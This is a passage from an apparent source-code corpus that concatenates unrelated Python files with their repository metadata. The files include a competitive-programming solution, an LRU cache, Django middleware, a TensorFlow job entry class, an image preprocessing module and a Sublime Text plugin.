eta = etamat[0,0]+etamat[1,0]+etamat[1,1]+etamat[2,0]+etamat[2,1]+etamat[2,2]
print 'namefile: ', namefile
print 'eta', eta
print '\ncalpol:\n'
print calpol
print '\npypol\n'
print pypol
f.write(str(n) + '\nNamefile:' + namefile + '\n\nRatios:\n' + str(ratios) + '\n\nCalpol:\n' + str(calpol) + '\n\nPypol:\n' + str(pypol) + '\n\n')
f.flush()
f.close()
g.flush()
g.close()
print 'Job Completed Successfully.'
| [
"sheridan.few@gmail.com"
] | sheridan.few@gmail.com |
89d2637b7ecb3c046c9cf2ac5e189c50f8e4d35d | 54d2887e3c910f68366bd0aab3c692d54245e22a | /abc/abc_001_041/abc011/d.py | 723dc876991401fff8adfa9d7cf1dbf1fa1fc016 | [] | no_license | Kevinrobot34/atcoder | 7aec367fd2c6b589e9d583dae7b3c7520ce9fa12 | 482ea508f098f81e4f19522fe518dd22c781aca9 | refs/heads/master | 2022-07-10T23:44:45.290022 | 2022-06-29T11:30:26 | 2022-06-29T11:30:26 | 158,081,477 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 816 | py | def comb(n: int, k: int) -> int:
if n < k or n < 0 or k < 0:
return 0
k = min(k, n - k)
ans = 1
for i in range(1, k + 1):
ans *= n - i + 1
ans //= i
return ans
n, d = map(int, input().split())
x, y = map(int, input().split())
if x % d == 0 and y % d == 0:
x //= d
y //= d
ans = 0.0
for nx in range(n + 1):
ny = n - nx
if (nx + x) % 2 != 0:
continue
if (ny + y) % 2 != 0:
continue
if x > nx:
continue
if y > ny:
continue
nx_p = (nx + x) // 2
ny_p = (ny + y) // 2
# print(n, nx, nx_p, ny, ny_p)
tmp = comb(n, nx) / (4**n)
tmp *= comb(nx, nx_p)
tmp *= comb(ny, ny_p)
ans += tmp
else:
ans = 0.0
print(ans)
| [
"kevinrobot34@yahoo.co.jp"
] | kevinrobot34@yahoo.co.jp |
c5eb61801d7b041d9a1c3f7598d72a8cec4b843b | 27f7a9849d9c3f2c6b3607a7233bf73a49f62348 | /146.LRU_Cache.py | 3a5aa1399a641fd70c13232abe6f6663134c8e9e | [] | no_license | welsny/solutions | 32dcd878e2842e76bd6519d93b22a4990b87a28b | f4cd43f082b58d4410008af49325770bc84d3aba | refs/heads/master | 2021-06-05T04:21:28.880359 | 2020-04-21T14:49:50 | 2020-04-21T14:49:50 | 69,113,825 | 1 | 0 | null | 2020-04-21T14:49:51 | 2016-09-24T16:27:52 | Python | UTF-8 | Python | false | false | 1,357 | py | #!/usr/bin/env python3
class Node:
def __init__(self, key, val, next=None):
self.key = key
self.val = val
self.next = next
class LRUCache:
def __init__(self, capacity: int):
head = Node(None, None)
self.head = head
self.curr = head
self.cap = capacity
self.d = {}
def put(self, key: int, value: int) -> None:
if key in self.d:
self.d[key].next.val = value
self.get(key)
return
node = Node(key, value)
self.d[key] = self.curr
self.curr.next = node
self.curr = node
if len(self.d) > self.cap:
node = self.head.next
del self.d[node.key]
self.head.next = node.next
self.d[node.next.key] = self.head
def get(self, key: int) -> int:
if key not in self.d:
return -1
prev, node = self.d[key], self.d[key].next
if self.curr != node:
prev.next = node.next
self.d[node.next.key] = prev
self.curr.next = node
self.d[node.key] = self.curr
node.next = None
self.curr = node
return node.val
# Your LRUCache object will be instantiated and called as such:
# obj = LRUCache(capacity)
# param_1 = obj.get(key)
# obj.put(key,value)
| [
"zengw@mssm.org"
] | zengw@mssm.org |
4b6f6c167b59f0873d8f3a739cdb2949a0a0ffb7 | 6a1081f3db1e98cb29e67da6d7041388d3cf2f52 | /survey/middleware.py | fbc8097435ea7882f156c4894ddb729c614240a9 | [
"MIT"
] | permissive | watchdogpolska/ankieta-rodzic-po-ludzku-nfz | 5b3827d10b3c5221bc4374c69fd4e19c8f296620 | 68b1d1ccac969ca51416761d1168678effb1e6c6 | refs/heads/master | 2021-01-20T10:32:20.075351 | 2016-12-02T02:17:50 | 2016-12-02T02:17:50 | 74,078,198 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,040 | py | from django.utils.deprecation import MiddlewareMixin
class ForceDefaultLanguageMiddleware(MiddlewareMixin, object):
"""
Ignore Accept-Language HTTP headers
This will force the I18N machinery to always choose settings.LANGUAGE_CODE
as the default initial language, unless another one is set via sessions or cookies
Should be installed *before* any middleware that checks request.META['HTTP_ACCEPT_LANGUAGE'],
namely django.middleware.locale.LocaleMiddleware
"""
def process_request(self, request):
if 'HTTP_ACCEPT_LANGUAGE' in request.META:
del request.META['HTTP_ACCEPT_LANGUAGE']
class XForwardedForMiddleware(MiddlewareMixin, object):
def process_request(self, request):
if "HTTP_X_FORWARDED_FOR" in request.META and not request.META.get("REMOTE_ADDR", False):
request.META["HTTP_X_PROXY_REMOTE_ADDR"] = request.META["REMOTE_ADDR"]
parts = request.META["HTTP_X_FORWARDED_FOR"].split(",", 1)
request.META["REMOTE_ADDR"] = parts[0]
| [
"naczelnik@jawnosc.tk"
] | naczelnik@jawnosc.tk |
88a3b065af89c241bf090090b2dac18b3996945a | f3d38d0e1d50234ce5f17948361a50090ea8cddf | /백준/Silver/Silver 5/20411번 ; 추첨상 사수 대작전! (Normal).py | cfdf13c3ce3e1479bf025821524fe12ff4bc6d7c | [] | no_license | bright-night-sky/algorithm_study | 967c512040c183d56c5cd923912a5e8f1c584546 | 8fd46644129e92137a62db657187b9b707d06985 | refs/heads/main | 2023-08-01T10:27:33.857897 | 2021-10-04T14:36:21 | 2021-10-04T14:36:21 | 323,322,211 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 370 | py | # https://www.acmicpc.net/problem/20411
from sys import stdin
m, Seed, X1, X2 = map(int, stdin.readline().split(' '))
a, c = 1, 1
ac_founded = False
for a in range(0, m):
for c in range(0, m):
if X1 == (a * Seed + c) % m and X2 == (a * X1 + c) % m:
print(a, c)
ac_founded = True
break
if ac_founded:
break | [
"bright_night_sky@naver.com"
] | bright_night_sky@naver.com |
6be5d424f2c64add9c3d0e6b9bdac6fb207e8c77 | 0ed9a8eef1d12587d596ec53842540063b58a7ec | /cloudrail/knowledge/context/azure/resources_builders/terraform/function_app_builder.py | 0fd39b1b2470cd6bae0490d4302a2981b27d133e | [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | cbc506/cloudrail-knowledge | 8611faa10a3bf195f277b81622e2590dbcc60da4 | 7b5c9030575f512b9c230eed1a93f568d8663708 | refs/heads/main | 2023-08-02T08:36:22.051695 | 2021-09-13T15:23:33 | 2021-09-13T15:24:26 | 390,127,361 | 0 | 0 | MIT | 2021-07-27T21:08:06 | 2021-07-27T21:08:06 | null | UTF-8 | Python | false | false | 1,015 | py | from cloudrail.knowledge.context.azure.resources.constants.azure_resource_type import AzureResourceType
from cloudrail.knowledge.context.azure.resources.webapp.azure_function_app import AzureFunctionApp
from cloudrail.knowledge.context.azure.resources.webapp.constants import FieldMode
from cloudrail.knowledge.context.azure.resources_builders.terraform.azure_terraform_builder import AzureTerraformBuilder
class FunctionAppBuilder(AzureTerraformBuilder):
def do_build(self, attributes: dict):
client_cert_mode: FieldMode = None
if self._is_known_value(attributes, 'client_cert_mode'):
client_cert_mode = FieldMode(attributes['client_cert_mode'])
return AzureFunctionApp(name=attributes['name'],
client_cert_mode=client_cert_mode,
https_only=self._get_known_value(attributes, 'https_only', False))
def get_service_name(self) -> AzureResourceType:
return AzureResourceType.AZURERM_FUNCTION_APP
| [
"ori.bar.emet@gmail.com"
] | ori.bar.emet@gmail.com |
a56065794e6125d049d8c77b43c8f19352abf99c | 4950b0412d5a764075af0d6bdfb95c1a6fcc971a | /core/src/main/python/akdl/entry/base_entry.py | 54f048a7a0b7d058cdc56c1d7f2c7462bde0f3d6 | [
"Apache-2.0"
] | permissive | zhu1971/Alink | 7cae17e0fad1ca3efd940299e76042e22df9611a | d600bbf215c16b710d99b9b2404fc3da3e508997 | refs/heads/master | 2023-08-29T20:06:12.148089 | 2021-11-02T03:55:42 | 2021-11-02T03:55:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,461 | py | import abc
from typing import Dict, Callable
import tensorflow as tf
from flink_ml_framework.context import Context
from flink_ml_framework.java_file import *
from ..runner import tf_helper, io_helper
from ..runner.output_writer import DirectOutputWriter
try:
from flink_ml_tensorflow.tensorflow_context import TFContext
except:
from flink_ml_tensorflow2.tensorflow_context import TFContext
# noinspection PyUnresolvedReferences
from tensorflow_io.core.python.ops import core_ops
__all__ = ['TF1_TYPE', 'TF2_TYPE']
TF1_TYPE = 'tf1'
TF2_TYPE = 'tf2'
class BaseEntry(abc.ABC):
def __init__(self, func_name, engine_type):
self.func_name = func_name
self.engine_type = engine_type
@staticmethod
def get_func_by_name(func_name):
"""
Get function by the func name
:param func_name: func name
:return: function
"""
if '.' not in func_name:
if func_name in globals():
return globals()[func_name]
else:
raise RuntimeError('cannot find function[{}]'.format(func_name))
else:
module_name, func_name = func_name.rsplit('.', 1)
import importlib
# load the module, will raise ImportError if module cannot be loaded
m = importlib.import_module(module_name)
# get the class, will raise AttributeError if class cannot be found
c = getattr(m, func_name)
return c
@abc.abstractmethod
def construct_args(self, **kwargs):
pass
def is_batch(self):
return True
def post_process(self, **kwargs):
pass
def entry_func(self, context: Context):
tf_context = TFContext(context)
properties = tf_context.properties
print('properties', properties, flush=True)
# intra_op_parallelism is set by akdl, because there is a bug in TensorFlow 1.x
# See: https://stackoverflow.com/questions/34426268/restricting-number-of-cores-used
intra_op_parallelism = int(properties['ALINK:intra_op_parallelism'])
if self.engine_type == TF1_TYPE:
tf_helper.set_intra_op_parallelism(intra_op_parallelism_threads=intra_op_parallelism)
elif self.engine_type == TF2_TYPE:
tf.config.threading.set_intra_op_parallelism_threads(intra_op_parallelism)
num_workers = int(properties['ALINK:num_workers'])
work_dir = properties['ALINK:work_dir']
cluster, task_type, task_index = tf_context.export_estimator_cluster()
if self.is_batch():
java_queue_file = JavaFile(context.from_java(), context.to_java())
dataset_file = os.path.join(work_dir, 'dataset.tfrecords')
dataset, dataset_length = io_helper.convert_java_queue_file_to_repeatable_dataset(java_queue_file,
dataset_file)
print("number of records: " + str(dataset_length), flush=True)
dataset_fn: Callable[[], tf.data.TFRecordDataset] = lambda: tf.data.TFRecordDataset(dataset_file)
else:
dataset_fn: Callable[[], tf.data.TFRecordDataset] = lambda: tf_context.flink_stream_dataset()
dataset = None
dataset_file = None
dataset_length = None
saved_model_dir = os.path.join(work_dir, 'savedmodel')
user_params: Dict = json.loads(properties['ALINK:user_defined_params'])
for i in range(1, 1024):
key = "ALINK:bc_" + str(i)
if key in properties:
user_params[key] = context.properties[key]
key = "ALINK:model_dir"
if key in properties:
user_params[key] = properties[key]
output_writer = DirectOutputWriter(tf_context.from_java(), tf_context.to_java())
locals_copy = locals().copy()
locals_copy.pop("self")
print("locals_copy = ", locals_copy, flush=True)
args = self.construct_args(**locals_copy)
func = self.get_func_by_name(self.func_name)
func(args)
print("task_type = {}, task_index = {}: done tf_user_main".format(task_type, task_index), flush=True)
local_vars = locals().copy()
local_vars.pop('self')
self.post_process(**local_vars)
print("task_type = {}, task_index = {}: exit".format(task_type, task_index), flush=True)
output_writer.close()
| [
"shaomeng.wang.w@gmail.com"
] | shaomeng.wang.w@gmail.com |
ebd96c8b735de3f30f45191d761b2314a815da03 | bf0e884ed3c9b57d0bc022c45b4bd50f7f5ba34a | /tomheon/day16/day16-1.py | 35f010badc8a70fc58d03b9433adaa3d8b05f42c | [
"MIT"
] | permissive | sean-hart/advent2020 | 8db117f3e778ec8044e97ce8a0d17edeb6351415 | 1174afcedf9a8db5134803869e63ea182637fc29 | refs/heads/main | 2023-02-07T15:52:57.956987 | 2020-12-27T00:42:55 | 2020-12-27T00:42:55 | 317,643,649 | 0 | 8 | MIT | 2020-12-27T00:42:56 | 2020-12-01T19:17:17 | Python | UTF-8 | Python | false | false | 1,704 | py | import sys
from itertools import takewhile, dropwhile
class Rule:
def __init__(self, field, ranges):
self.field = field
self.ranges = ranges
def __repr__(self):
return f'Rule {self.field} {self.ranges}'
def is_valid(self, value):
return any([lower <= value <= upper for (lower, upper) in self.ranges])
def parse_range(r):
return tuple([int(i) for i in r.split('-')])
def parse_rule(raw_rule):
field, raw_range_opts = raw_rule.split(':')
raw_ranges = raw_range_opts.split(' or ')
ranges = [parse_range(r) for r in raw_ranges]
return Rule(field, ranges)
def parse_rules(instream):
raw_rules = [line.strip() for line in takewhile(lambda l: l.strip(), instream)]
return [parse_rule(raw_rule) for raw_rule in raw_rules]
def parse_ticket(line):
return [int(i) for i in line.strip().split(',')]
def parse_my_ticket(instream):
it = dropwhile(lambda l: l.strip() == 'your ticket:', instream)
line = next(it).strip()
return parse_ticket(line), it
def parse_nearby_tickets(instream):
it = dropwhile(lambda l: not l.strip(), instream)
it2 = dropwhile(lambda l: l.strip() == 'nearby tickets:', it)
return [parse_ticket(line) for line in it2 if line.strip()]
def find_invalid_values(tickets, rules):
for t in tickets:
for v in t:
if not any([r.is_valid(v) for r in rules]):
yield v
def main():
rules = parse_rules(sys.stdin)
my_ticket, it = parse_my_ticket(sys.stdin)
nearby_tickets = parse_nearby_tickets(it)
invalid_values = find_invalid_values(nearby_tickets, rules)
print(sum(invalid_values))
if __name__ == '__main__':
main()
| [
"tomheon@gmail.com"
] | tomheon@gmail.com |
83892bf39e11723b6592e08710e80767f34d392a | bf80f309b6deb240be5fa82428ccffaedcb7ecf1 | /test/functional/wallet_disableprivatekeys.py | 71b4d7115620940c19e0c2d11d800254c7ca095a | [
"MIT"
] | permissive | danxb827/vektorcoin | b4677be9320de92a514d40eac213f51d1bc5e106 | be2a7adba6d00d1e378c969c77ea90daeecef9f7 | refs/heads/main | 2023-03-06T11:49:18.688978 | 2021-02-09T14:54:10 | 2021-02-09T14:54:10 | 336,577,132 | 1 | 1 | MIT | 2021-02-09T14:54:12 | 2021-02-06T16:05:36 | null | UTF-8 | Python | false | false | 1,275 | py | #!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test disable-privatekeys mode.
"""
from test_framework.test_framework import VEKTORCOINTestFramework
from test_framework.util import (
assert_raises_rpc_error,
)
class DisablePrivateKeysTest(VEKTORCOINTestFramework):
def set_test_params(self):
self.setup_clean_chain = False
self.num_nodes = 1
self.supports_cli = True
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
node = self.nodes[0]
self.log.info("Test disableprivatekeys creation.")
self.nodes[0].createwallet('w1', True)
self.nodes[0].createwallet('w2')
w1 = node.get_wallet_rpc('w1')
w2 = node.get_wallet_rpc('w2')
assert_raises_rpc_error(-4,"Error: Private keys are disabled for this wallet", w1.getnewaddress)
assert_raises_rpc_error(-4,"Error: Private keys are disabled for this wallet", w1.getrawchangeaddress)
w1.importpubkey(w2.getaddressinfo(w2.getnewaddress())['pubkey'])
if __name__ == '__main__':
DisablePrivateKeysTest().main()
| [
"sourcedecho@outlook.com"
] | sourcedecho@outlook.com |
5d3fe22ea2528297fb0d306ace18125cb8d09444 | c46754b9600a12df4f9d7a6320dfc19aa96b1e1d | /examples/research_projects/lxmert/processing_image.py | 4343cfdbce846e9bf0a0cef33dbdde6e78f0ba8c | [
"Apache-2.0"
] | permissive | huggingface/transformers | ccd52a0d7c59e5f13205f32fd96f55743ebc8814 | 4fa0aff21ee083d0197a898cdf17ff476fae2ac3 | refs/heads/main | 2023-09-05T19:47:38.981127 | 2023-09-05T19:21:33 | 2023-09-05T19:21:33 | 155,220,641 | 102,193 | 22,284 | Apache-2.0 | 2023-09-14T20:44:49 | 2018-10-29T13:56:00 | Python | UTF-8 | Python | false | false | 5,747 | py | """
coding=utf-8
Copyright 2018, Antonio Mendoza Hao Tan, Mohit Bansal
Adapted From Facebook Inc, Detectron2
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.import copy
"""
import sys
from typing import Tuple
import numpy as np
import torch
from PIL import Image
from torch import nn
from transformers.image_utils import PILImageResampling
from utils import img_tensorize
class ResizeShortestEdge:
def __init__(self, short_edge_length, max_size=sys.maxsize):
"""
Args:
short_edge_length (list[min, max])
max_size (int): maximum allowed longest edge length.
"""
self.interp_method = "bilinear"
self.max_size = max_size
self.short_edge_length = short_edge_length
def __call__(self, imgs):
img_augs = []
for img in imgs:
h, w = img.shape[:2]
# later: provide list and randomly choose index for resize
size = np.random.randint(self.short_edge_length[0], self.short_edge_length[1] + 1)
if size == 0:
return img
scale = size * 1.0 / min(h, w)
if h < w:
newh, neww = size, scale * w
else:
newh, neww = scale * h, size
if max(newh, neww) > self.max_size:
scale = self.max_size * 1.0 / max(newh, neww)
newh = newh * scale
neww = neww * scale
neww = int(neww + 0.5)
newh = int(newh + 0.5)
if img.dtype == np.uint8:
pil_image = Image.fromarray(img)
pil_image = pil_image.resize((neww, newh), PILImageResampling.BILINEAR)
img = np.asarray(pil_image)
else:
img = img.permute(2, 0, 1).unsqueeze(0) # 3, 0, 1) # hw(c) -> nchw
img = nn.functional.interpolate(
img, (newh, neww), mode=self.interp_method, align_corners=False
).squeeze(0)
img_augs.append(img)
return img_augs
class Preprocess:
def __init__(self, cfg):
self.aug = ResizeShortestEdge([cfg.INPUT.MIN_SIZE_TEST, cfg.INPUT.MIN_SIZE_TEST], cfg.INPUT.MAX_SIZE_TEST)
self.input_format = cfg.INPUT.FORMAT
self.size_divisibility = cfg.SIZE_DIVISIBILITY
self.pad_value = cfg.PAD_VALUE
self.max_image_size = cfg.INPUT.MAX_SIZE_TEST
self.device = cfg.MODEL.DEVICE
self.pixel_std = torch.tensor(cfg.MODEL.PIXEL_STD).to(self.device).view(len(cfg.MODEL.PIXEL_STD), 1, 1)
self.pixel_mean = torch.tensor(cfg.MODEL.PIXEL_MEAN).to(self.device).view(len(cfg.MODEL.PIXEL_STD), 1, 1)
self.normalizer = lambda x: (x - self.pixel_mean) / self.pixel_std
def pad(self, images):
max_size = tuple(max(s) for s in zip(*[img.shape for img in images]))
image_sizes = [im.shape[-2:] for im in images]
images = [
nn.functional.pad(
im,
[0, max_size[-1] - size[1], 0, max_size[-2] - size[0]],
value=self.pad_value,
)
for size, im in zip(image_sizes, images)
]
return torch.stack(images), torch.tensor(image_sizes)
def __call__(self, images, single_image=False):
with torch.no_grad():
if not isinstance(images, list):
images = [images]
if single_image:
assert len(images) == 1
for i in range(len(images)):
if isinstance(images[i], torch.Tensor):
images.insert(i, images.pop(i).to(self.device).float())
elif not isinstance(images[i], torch.Tensor):
images.insert(
i,
torch.as_tensor(img_tensorize(images.pop(i), input_format=self.input_format))
.to(self.device)
.float(),
)
# resize smallest edge
raw_sizes = torch.tensor([im.shape[:2] for im in images])
images = self.aug(images)
# transpose images and convert to torch tensors
# images = [torch.as_tensor(i.astype("float32")).permute(2, 0, 1).to(self.device) for i in images]
# now normalize before pad to avoid useless arithmetic
images = [self.normalizer(x) for x in images]
# now pad them to do the following operations
images, sizes = self.pad(images)
# Normalize
if self.size_divisibility > 0:
raise NotImplementedError()
# pad
scales_yx = torch.true_divide(raw_sizes, sizes)
if single_image:
return images[0], sizes[0], scales_yx[0]
else:
return images, sizes, scales_yx
def _scale_box(boxes, scale_yx):
boxes[:, 0::2] *= scale_yx[:, 1]
boxes[:, 1::2] *= scale_yx[:, 0]
return boxes
def _clip_box(tensor, box_size: Tuple[int, int]):
assert torch.isfinite(tensor).all(), "Box tensor contains infinite or NaN!"
h, w = box_size
tensor[:, 0].clamp_(min=0, max=w)
tensor[:, 1].clamp_(min=0, max=h)
tensor[:, 2].clamp_(min=0, max=w)
tensor[:, 3].clamp_(min=0, max=h)
| [
"noreply@github.com"
] | huggingface.noreply@github.com |
513d127c57faca126f4109777231420faaaeaec5 | e71b6d14fbdbc57c7234ca45a47329d7d02fc6f7 | /flask_api/venv/lib/python3.7/site-packages/vsts/cloud_load_test/v4_1/models/test_drop_ref.py | b3b8c06b81e04f5cdadb22ea76c34dd594a80941 | [] | no_license | u-blavins/secret_sasquatch_society | c36993c738ab29a6a4879bfbeb78a5803f4f2a57 | 0214eadcdfa9b40254e331a6617c50b422212f4c | refs/heads/master | 2020-08-14T00:39:52.948272 | 2020-01-22T13:54:58 | 2020-01-22T13:54:58 | 215,058,646 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 999 | py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from msrest.serialization import Model
class TestDropRef(Model):
"""TestDropRef.
:param id:
:type id: str
:param url:
:type url: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'}
}
def __init__(self, id=None, url=None):
super(TestDropRef, self).__init__()
self.id = id
self.url = url
| [
"usama.blavins1@gmail.com"
] | usama.blavins1@gmail.com |
72f28dbdfa4a58e7d3644a80084ca9459ef4cb7e | 2eb297cbb82d6a52fe8596dcf9a30a11b2f40f5b | /ui/input.py | 00f4078531853f8819177dea3216bd6918d46918 | [
"MIT"
] | permissive | martijndeb/sublime_db | 909cce11b038c05549c5337c1ef2d5847356fbc3 | 0d1cac7b87b32f843e65d8bee6583cadd5f9ea6a | refs/heads/master | 2023-04-18T12:36:20.218397 | 2019-04-25T14:32:05 | 2019-04-25T14:32:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,713 | py |
from sublime_db.core.typecheck import (
Any,
Callable,
Optional
)
import sublime
import sublime_plugin
from . import view_drag_select
command_id = 0
command_data = {}
sublime_command_visible = False
is_running_input = False
class SublimeDebugInputCommand(sublime_plugin.WindowCommand):
def run(self, command_id, **args):
global is_running_input
is_running_input = False
command_data[command_id][1](**args)
def input(self, args):
return command_data[args["command_id"]][0]
def is_visible(self):
return sublime_command_visible
def on_view_drag_select(event):
if is_running_input:
window = sublime.active_window()
window.run_command("hide_overlay", {
"overlay": "command_palette",
})
view_drag_select.add(on_view_drag_select)
def run_input_command(input, run, on_cancel = None):
global command_id
command_id += 1
current_command = command_id
command_data[current_command] = [input, run]
window = sublime.active_window()
def on_cancel_internal():
def cb():
# since we are async here we don't want to hide the panel if a new one was presented
if current_command == command_id:
window.run_command("hide_overlay", {
"overlay": "command_palette",
})
#when we do this while a command is closing it crashes sublime
sublime.set_timeout(cb, 0)
global is_running_input
is_running_input = False
input._on_cancel_internal = on_cancel_internal
if on_cancel:
input._on_cancel = on_cancel
def cb():
global sublime_command_visible
sublime_command_visible = True
window.run_command("hide_overlay", {
"overlay": "command_palette",
}
)
global is_running_input
is_running_input = True
window.run_command("show_overlay", {
"overlay": "command_palette",
"command": "sublime_debug_input",
"args": {
"command_id" : command_id
}
}
)
print('run command')
sublime_command_visible = False
sublime.set_timeout(cb, 0)
class TextInput(sublime_plugin.TextInputHandler):
def __init__(self, placeholder=None, initial=None, on_cancel=None, arg_name="text"):
super().__init__()
self._placeholder = placeholder
self._initial = initial
self.arg_name = arg_name
self._on_cancel = on_cancel
self._on_cancel_internal = None
def placeholder(self):
return self._placeholder
def initial_text(self):
return self._initial
def next_input(self, args):
return None
def name(self):
return self.arg_name
def cancel(self):
print('canceld')
if self._on_cancel_internal:
self._on_cancel_internal()
if self._on_cancel:
self._on_cancel()
class ListInputItem:
def __init__(self, text, name = None, next_input = None):
self.text = text
self.name = name
self.next_input = next_input
class ListInput(sublime_plugin.ListInputHandler):
def __init__(self, values, placeholder=None, index=0, on_cancel=None, arg_name="list"):
super().__init__()
self._next_input = None
self.values = values
self._placeholder = placeholder
self.index = index
self._on_cancel = on_cancel
self.arg_name = arg_name
self._on_cancel_internal = None
def name(self):
return self.arg_name
def placeholder(self):
return self._placeholder
def list_items(self):
items = []
for index, value in enumerate(self.values):
items.append([value.text, index])
return (items, self.index)
def confirm(self, value):
self._next_input = self.values[value].next_input
return value
def validate(self, value):
return True
def next_input(self, args):
return self._next_input
def cancel(self):
if self._on_cancel_internal:
self._on_cancel_internal()
if self._on_cancel:
self._on_cancel()
def description(self, value, text):
return self.values[value].name or self.values[value].text
| [
"2889367+daveleroy@users.noreply.github.com"
] | 2889367+daveleroy@users.noreply.github.com |
396ea058a84cb8b5082227faae609f9771c8e101 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_principals.py | 16f3fb65ff96b20997c351c44f1c60a775c5e89e | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 234 | py |
#calss header
class _PRINCIPALS():
def __init__(self,):
self.name = "PRINCIPALS"
self.definitions = principal
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['principal']
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
a66968d41f968900b87bb7951d047e994dad4c09 | ea393959886a5cd13da4539d634f2ca0bbcd06a2 | /25.py | bf36705e4f07d2004a75a4ce2f12358aab1d6d03 | [] | no_license | zhangchizju2012/LeetCode | f605f35b82f16282559af71e4e61ec2629a90ebc | 0c4c38849309124121b03cc0b4bf39071b5d1c8c | refs/heads/master | 2020-04-05T12:12:14.810639 | 2018-08-09T10:24:52 | 2018-08-09T10:24:52 | 81,021,830 | 7 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,779 | py | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 8 01:15:40 2017
@author: zhangchi
"""
# Definition for singly-linked list.
class ListNode(object):
def __init__(self, x):
self.val = x
self.next = None
class Solution(object):
# 粗粗地看了解法https://discuss.leetcode.com/topic/7126/short-but-recursive-java-code-with-comments
def reverseKGroup(self, head, k):
"""
:type head: ListNode
:type k: int
:rtype: ListNode
"""
cur = head
count = 0
while cur is not None and count < k:
cur = cur.next
count += 1
if count == k:
future = self.reverseKGroup(cur, k) # 后面的部分用recursion
count = 0
while count < k: # 调整前面k个node的顺序
node = head
head = head.next
node.next = future
future = node
count += 1
return future
else: # 长度不够的话不用调整顺序
return head
s = Solution()
print s.reverseKGroup()
#==============================================================================
#
#
# def helper(self, head):
# # 翻转整个链表
# result = None
# while head is not None:
# if result is None:
# result = head
# head = head.next
# result.next = None
# else:
# node = head
# head = head.next
# node.next = result
# result = node
# return result
#==============================================================================
| [
"zhangchizju2012@zju.edu.cn"
] | zhangchizju2012@zju.edu.cn |
6cb71d90adc94c50b55376b5146b6cc26ddb32d5 | 56f5b2ea36a2258b8ca21e2a3af9a5c7a9df3c6e | /CMGTools/H2TauTau/prod/25aug_corrMC/up/mc/SUSYGluGluToHToTauTau_M-140_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0_1377467520/HTT_24Jul_newTES_manzoni_Up_Jobs/Job_34/run_cfg.py | 4bc803d42d7d1aa922511e475adb6ea13772dc42 | [] | no_license | rmanzoni/HTT | 18e6b583f04c0a6ca10142d9da3dd4c850cddabc | a03b227073b2d4d8a2abe95367c014694588bf98 | refs/heads/master | 2016-09-06T05:55:52.602604 | 2014-02-20T16:35:34 | 2014-02-20T16:35:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,005 | py | import FWCore.ParameterSet.Config as cms
import os,sys
sys.path.append('/afs/cern.ch/user/m/manzoni/summer13/CMGTools/CMSSW_5_3_9/src/CMGTools/H2TauTau/prod/25aug_corrMC/up/mc/SUSYGluGluToHToTauTau_M-140_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0_1377467520/HTT_24Jul_newTES_manzoni_Up_Jobs')
from base_cfg import *
process.source = cms.Source("PoolSource",
noEventSort = cms.untracked.bool(True),
inputCommands = cms.untracked.vstring('keep *',
'drop cmgStructuredPFJets_cmgStructuredPFJetSel__PAT'),
duplicateCheckMode = cms.untracked.string('noDuplicateCheck'),
fileNames = cms.untracked.vstring('/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-140_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_99_1_WsI.root',
'/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-140_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_9_1_2xl.root')
)
| [
"riccardo.manzoni@cern.ch"
] | riccardo.manzoni@cern.ch |
664edc8cab885513f5ccd3738e50408ce10f11a2 | 10d17864a685c025bb77959545f74b797f1d6077 | /capitulo 09/09.25.py | 003c9c3b9fcfcc1cfd1681a56ca7483c17d12614 | [] | no_license | jcicerof/IntroducaoPython | 02178d2dfcaa014587edbd3090c517089ccef7c2 | 02e619c7c17e74acdc3268fbfae9ab624a3601dd | refs/heads/master | 2020-04-24T18:12:21.422079 | 2019-02-23T05:14:43 | 2019-02-23T05:14:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 709 | py | ##############################################################################
# Parte do livro Introdução à Programação com Python
